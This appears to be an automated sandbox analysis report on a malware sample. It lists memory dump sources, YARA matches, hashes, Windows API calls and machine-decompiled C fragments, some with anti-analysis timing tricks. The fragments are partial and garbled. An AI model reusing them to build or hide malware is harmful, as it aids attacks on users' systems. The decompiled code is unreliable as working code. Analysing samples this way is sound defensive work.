                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                                                                                                                    • Instruction ID: 06c49a2685b3612c4f97c414be4de5809c158a7de30b544f0fd5af691a338a64
                                                                                                                                    • Opcode Fuzzy Hash: df68127870d41f3fc72b85346807ec1dc9a6de8922804ccdd21096e0b5a46060
                                                                                                                                    • Instruction Fuzzy Hash: 629002B220100402F14071598404B460009D7E0345F51C05AE5055558E8699DDE5BAA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                                                                                                                    • Instruction ID: 13949c945b3d6db557ca2a40d0073df7f8c1db3e3149f6b7dfd304019b780f69
                                                                                                                                    • Opcode Fuzzy Hash: e9dd46da3a98237732d12494cca41702f608ac019ccb387422e4db0ce59db785
                                                                                                                                    • Instruction Fuzzy Hash: 08900266211000032105B5594704907004AD7E5395351C06AF1006554CD661D871A561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
                                                                                                                                    • Instruction ID: 19667e0e2f1f99f21217b69e2263c752c452439c585b9b7162324096843d72a8
                                                                                                                                    • Opcode Fuzzy Hash: ec9250c42a93bcbe92f3d053e7b142b964b2e2041d190abffb1f858b47f99d76
                                                                                                                                    • Instruction Fuzzy Hash: 9490027220108802F1107159C404B4A0009D7E0345F55C45AE441565CD86D5D8A1B561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                                                                                                                    • Instruction ID: 8268e58e94360c8d8adce895b99587da80e5041fc994cc5dfb712d8b20516a1a
                                                                                                                                    • Opcode Fuzzy Hash: 8da241fab50686a88139d8aded3de483c0ca00b916344dbd16c08d3ba015ccc2
                                                                                                                                    • Instruction Fuzzy Hash: 589002626010004261407169C844D064009FBF1255751C16AE0989554D8599D875AAA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                                                                                                                    • Instruction ID: d5498cc2f17c16089dd0d0ecbd55374a13c018eb5cba980de9ee752e04dd6cad
                                                                                                                                    • Opcode Fuzzy Hash: 807c591407c8170649d61b56051640e933db41dff5ef289ae39d80d0fa717746
                                                                                                                                    • Instruction Fuzzy Hash: 0190026221180042F20075698C14F070009D7E0347F51C15EE0145558CC955D871A961
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                                                                                                                    • Instruction ID: d70f77b73723669d52c95d0c8705d4b72a4e5e899fc9c57453f539984a17cf8d
                                                                                                                                    • Opcode Fuzzy Hash: 58ad8a44d04975926aa46afc90440db3d9a8859db03e3718f5e1b35811bc2b5e
                                                                                                                                    • Instruction Fuzzy Hash: 8390026230100003F14071599418A064009E7F1345F51D05AE0405558CD955D866A662
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                                                                                                                    • Instruction ID: 3556ae7776520ce2c1a1a999bf29caceaaafe251fc05fbad87a7219fca50ceb4
                                                                                                                                    • Opcode Fuzzy Hash: 18f0edc980854b9830024ccb12f38e13d4329c5e403b9109f1731769c7f41cc5
                                                                                                                                    • Instruction Fuzzy Hash: 5E90026A21300002F18071599408A0A0009D7E1246F91D45EE000655CCC955D879A761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                                                                                                                    • Instruction ID: a1a38ed8286d40734e65377907d04c9987db98004c860002c95bf89bde7600f3
                                                                                                                                    • Opcode Fuzzy Hash: 421ea1deb41c201aa760d55cc19f66dcf9d514c74fdefbe36c8ba259e5c6fdd1
                                                                                                                                    • Instruction Fuzzy Hash: 9E90027231114402F1107159C404B060009D7E1245F51C45AE081555CD86D5D8A1B562
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                                                                                                                    • Instruction ID: 3d368f248dfccf5efc21ef55edc379401aaf70d8016f3887c23ea81c4388e23e
                                                                                                                                    • Opcode Fuzzy Hash: cd19c23e0f4064b8851573a4325d73dd4e06536a63b1f080e2fd17d27deeb84e
                                                                                                                                    • Instruction Fuzzy Hash: 9890027220100402F10075999408A460009D7F0345F51D05AE5015559EC6A5D8A1B571
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -
                                                                                                                                    • API String ID: 0-2547889144
                                                                                                                                    • Opcode ID: 2f30c9fde44adb42246ffc923b5daf93ac2da44854ed9e3c1b4275d2f5fa375e
                                                                                                                                    • Instruction ID: 93350c5dee2b5ff7469d7ce66aa7b81f19be215ab90ed6fc3b1510e6384b48e7
                                                                                                                                    • Opcode Fuzzy Hash: 2f30c9fde44adb42246ffc923b5daf93ac2da44854ed9e3c1b4275d2f5fa375e
                                                                                                                                    • Instruction Fuzzy Hash: 1411C9B1E0490DEBCB80EBD8C9817ADBBB5FF40308F208089D511EB286C7755A45DF56
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E00408880(intOrPtr _a4) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				char _v24;
                                                                                                                                    				char _v284;
                                                                                                                                    				char _v804;
                                                                                                                                    				char _v840;
                                                                                                                                    				void* _t24;
                                                                                                                                    				void* _t31;
                                                                                                                                    				void* _t33;
                                                                                                                                    				void* _t34;
                                                                                                                                    				void* _t39;
                                                                                                                                    				void* _t50;
                                                                                                                                    				intOrPtr _t52;
                                                                                                                                    				void* _t53;
                                                                                                                                    				void* _t54;
                                                                                                                                    				void* _t55;
                                                                                                                                    				void* _t56;
                                                                                                                                    
                                                                                                                                    				_t52 = _a4;
                                                                                                                                    				_t39 = 0; // executed
                                                                                                                                    				_t24 = E00406C00(_t52,  &_v24); // executed
                                                                                                                                    				_t54 = _t53 + 8;
                                                                                                                                    				if(_t24 != 0) {
                                                                                                                                    					E00406E10( &_v24,  &_v840);
                                                                                                                                    					_t55 = _t54 + 8;
                                                                                                                                    					do {
                                                                                                                                    						E00419C90( &_v284, 0x104);
                                                                                                                                    						E0041A300( &_v284,  &_v804);
                                                                                                                                    						_t56 = _t55 + 0x10;
                                                                                                                                    						_t50 = 0x4f;
                                                                                                                                    						while(1) {
                                                                                                                                    							_t31 = E00413D90(E00413D30(_t52, _t50),  &_v284);
                                                                                                                                    							_t56 = _t56 + 0x10;
                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t50 = _t50 + 1;
                                                                                                                                    							if(_t50 <= 0x62) {
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    							}
                                                                                                                                    							goto L8;
                                                                                                                                    						}
                                                                                                                                    						_t9 = _t52 + 0x14; // 0xffffdfd5
                                                                                                                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                    						_t39 = 1;
                                                                                                                                    						L8:
                                                                                                                                    						_t33 = E00406E40( &_v24,  &_v840);
                                                                                                                                    						_t55 = _t56 + 8;
                                                                                                                                    					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                    					_t34 = E00406EC0(_t52,  &_v24); // executed
                                                                                                                                    					if(_t39 == 0) {
                                                                                                                                    						asm("rdtsc");
                                                                                                                                    						asm("rdtsc");
                                                                                                                                    						_v8 = _t34 - 0 + _t34;
                                                                                                                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                                                                                    					}
                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                                                                                    					return 1;
                                                                                                                                    				} else {
                                                                                                                                    					return _t24;
                                                                                                                                    				}
                                                                                                                                    			}



















                                                                                                                                    0x004088a6
                                                                                                                                    0x004088a6

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
                                                                                                                                    • Instruction ID: 4c617b39c0906e70e5cb6cd40e0abf5b3059e0cce04910c40f127af8aed32689
                                                                                                                                    • Opcode Fuzzy Hash: 42d0d5b762ed767f255d0158a4eaae86d93edb632e728fa2293ce1f2afc345c0
                                                                                                                                    • Instruction Fuzzy Hash: D221FBB3D4020857DB15E664EE42AFF73AC9B50304F44047FE989A2181F6386B5987A6
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 008054E0: NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 0080020E
                                                                                                                                      • Part of subcall function 00805350: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008053A8
                                                                                                                                    • CreateFileW.KERNELBASE(00B8006A,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00800883
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile$DelayExecutionLibraryLoad
                                                                                                                                    • String ID: CoCreateInstance$CoInitialize$CoUninitialize
                                                                                                                                    • API String ID: 3867157277-2203488205
                                                                                                                                    • Opcode ID: d6ca3ae58426cf4b632ffe1d798b111aedde8e187175414878b8d949ed992dc9
                                                                                                                                    • Instruction ID: c0f9325fa1629f92cc20576eb33f6674e64504dbe07a78f6adeb7690cd4eddd5
                                                                                                                                    • Opcode Fuzzy Hash: d6ca3ae58426cf4b632ffe1d798b111aedde8e187175414878b8d949ed992dc9
                                                                                                                                    • Instruction Fuzzy Hash: 19720A75A00208EFDB54CB98CD94BAEB7B5FF48304F248198E509AB392D775AE41CF61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008053A8
                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,01000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,008002C0), ref: 008053C9
                                                                                                                                    • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,008002C0,?), ref: 008053DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Create$MappingView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1299149932-0
                                                                                                                                    • Opcode ID: d24d2622939d9e5828dc3b76ea277adea0551eb3ce31da15905b81e214a3e5ef
                                                                                                                                    • Instruction ID: 89ba651c0e55e58c44493aaa1eb10dd34170e151cfc04b54f8c262a2a56e622e
                                                                                                                                    • Opcode Fuzzy Hash: d24d2622939d9e5828dc3b76ea277adea0551eb3ce31da15905b81e214a3e5ef
                                                                                                                                    • Instruction Fuzzy Hash: C11133B4E40308BBEB10DBA4DC56FAE7B74EB44710F204555FA14BB2C0D671AB008B95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00407068(signed int __eax, void* __ecx, void* _a4, void* _a12) {
                                                                                                                                    				void* _v67;
                                                                                                                                    				void* _v68;
                                                                                                                                    				void* _t14;
                                                                                                                                    
                                                                                                                                    				_t14 = 0xa;
                                                                                                                                    				asm("in eax, 0x2e");
                                                                                                                                    				if ((__eax &  *(__ecx - 0x1c)) < 0) goto L4;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: 4c670c6f0f0cba0d72097344bc608441d6be2fc1ad2328d688a534863a34a0a6
                                                                                                                                    • Instruction ID: 58fff3a35d3351a8a9a8277dcc409a517e909d4cdc6365de26a03027caa90cf1
                                                                                                                                    • Opcode Fuzzy Hash: 4c670c6f0f0cba0d72097344bc608441d6be2fc1ad2328d688a534863a34a0a6
                                                                                                                                    • Instruction Fuzzy Hash: 4801DB31E842157BE720A6909C43FFE776C9B41B54F14415AFA04BA1C1E6A8690687EA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00407070(void* __eflags, void* _a4, void* _a12) {
                                                                                                                                    				void* _v67;
                                                                                                                                    				void* _v68;
                                                                                                                                    				void* _t35;
                                                                                                                                    
                                                                                                                                    				_t35 = __eflags;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004070CA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                    • Opcode ID: b5bfffa0ae5ba930087c66823f96fcbf81121beed5b23f19274be760725c8317
                                                                                                                                    • Instruction ID: 18ef527c81d78d6cf94a666dde549eb5d4912ba5f30213c62aa7d6dc7e6a36c6
                                                                                                                                    • Opcode Fuzzy Hash: b5bfffa0ae5ba930087c66823f96fcbf81121beed5b23f19274be760725c8317
                                                                                                                                    • Instruction Fuzzy Hash: A601A731A8022877E720AA959C43FFF776C9B40B55F04411AFF04BA1C2E6E8790646FA
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00B8006A,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00800883
                                                                                                                                      • Part of subcall function 008054E0: NtDelayExecution.NTDLL(00000000,00002710,?,?,00002710), ref: 0080550E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDelayExecutionFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3343200621-0
                                                                                                                                    • Opcode ID: ba2aed7be88c328491b47c092958357f24f5995f2ab93a4103c8a5492d60c929
                                                                                                                                    • Instruction ID: 3344dcf5f535cfde90c65b9d4b447e31116bed435a3e9c732291000d6fade39d
                                                                                                                                    • Opcode Fuzzy Hash: ba2aed7be88c328491b47c092958357f24f5995f2ab93a4103c8a5492d60c929
                                                                                                                                    • Instruction Fuzzy Hash: 85F01D74D04209A6EB609BA8CC96BAEBB70FF05724F304618EA55BB2C2D37059C08B84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                    			E004185E1(void* __edx, intOrPtr _a12, WCHAR* _a16, WCHAR* _a20, struct _LUID* _a24) {
                                                                                                                                    				int _t13;
                                                                                                                                    				void* _t19;
                                                                                                                                    				signed int _t23;
                                                                                                                                    
                                                                                                                                    				_t23 =  *[cs:esi+0x6f] * 0xce5ce4ad;
                                                                                                                                    				asm("adc [ebp-0x75], dl");
                                                                                                                                    				_push(_t23);
                                                                                                                                    				_t10 = _a12;
                                                                                                                                    				E00418D80(_t19, _a12, _a12 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                                                                                                    				_t13 = LookupPrivilegeValueW(_a16, _a20, _a24); // executed
                                                                                                                                    				return _t13;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    • Opcode ID: 1454166cf54bd9e695c0c9c56f3f4fd20ae242d74a2e1dfd25114fe0c1d67130
                                                                                                                                    • Instruction ID: a86059d8fe74c016f6871b1c432d8a636e0a54daf57ab58ab36152e98efd018e
                                                                                                                                    • Opcode Fuzzy Hash: 1454166cf54bd9e695c0c9c56f3f4fd20ae242d74a2e1dfd25114fe0c1d67130
                                                                                                                                    • Instruction Fuzzy Hash: 8BF0A0B6200204AFC710DF54DC82EE77BA9AF49314F148559FA199B641C530A811CBF5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 11f0ff7c054bbd822d4e58abb4db6e68b345ddee36eddc940ef3af2baa80afd8
                                                                                                                                    • Instruction ID: 1d2de598d1c5646c1e9a6e5f2c7f6532ce64b521e13c117375f07bc636b1e87b
                                                                                                                                    • Opcode Fuzzy Hash: 11f0ff7c054bbd822d4e58abb4db6e68b345ddee36eddc940ef3af2baa80afd8
                                                                                                                                    • Instruction Fuzzy Hash: F6E0DFB80006884FDB24EE29D8C1C9B3795BF812147108B8EE84847203C931D89B8AA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 30%
                                                                                                                                    			E00418490(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                    				void* _v3;
                                                                                                                                    				char _t15;
                                                                                                                                    				void* _t22;
                                                                                                                                    
                                                                                                                                    				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
                                                                                                                                    				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
                                                                                                                                    				E00418D80(_t22);
                                                                                                                                    				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                    				return _t15;
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004185F0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                    				int _t10;
                                                                                                                                    				void* _t15;
                                                                                                                                    
                                                                                                                                    				E00418D80(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                    				return _t10;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF72,0040CF72,00000041,00000000,?,00408B35), ref: 00418620
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                    			E004184C3(int _a3) {
                                                                                                                                    				intOrPtr _v1;
                                                                                                                                    				void* _t10;
                                                                                                                                    
                                                                                                                                    				asm("sbb dl, al");
                                                                                                                                    				asm("adc ch, [edx+0x68bcb5f9]");
                                                                                                                                    				asm("into");
                                                                                                                                    				asm("repe pop es");
                                                                                                                                    				_push(_t13);
                                                                                                                                    				_t5 = _v1;
                                                                                                                                    				E00418D80(_t10, _v1, _v1 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                    				ExitProcess(_a3);
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004184D0(intOrPtr _a4, int _a8) {
                                                                                                                                    				void* _t10;
                                                                                                                                    
                                                                                                                                    				_t5 = _a4;
                                                                                                                                    				E00418D80(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                    				ExitProcess(_a8);
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
